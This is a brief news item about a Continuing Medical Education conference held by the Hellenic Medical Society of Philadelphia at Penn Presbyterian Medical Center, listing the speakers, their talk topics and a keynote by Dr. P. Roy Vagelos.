Under the Direction of the Education Committee, Maria Limberis PhD and Mike Moussouttas MD and with the assistance of the Board of Directors, Hellenic Medical Society of Philadelphia organized a Continuing Medical Education conference on Saturday October 5th at Penn Presbyterian Medical Center.
Speakers included Dr Kimon Kostopoulos discussing “The Evolving Thought and Management of Hypertension”, Dr Frances Zappalla presenting “Childhood Obesity-What is the Future of our Children”, Dr Ellie Kelepouris discussing “Vitamin D in Health and Disease” and Dr Vanessa Vigilante presenting “Breathing: The Bridge between Mind and Body”
Keynote speaker was Dr. P. Roy Vagelos, Prior CEO, Merck and Co, Current Chairman, Regeneron Pharmaceuticals who presented his perspective of a Medical-scientific career as well as the impact of Greek origins on his success.
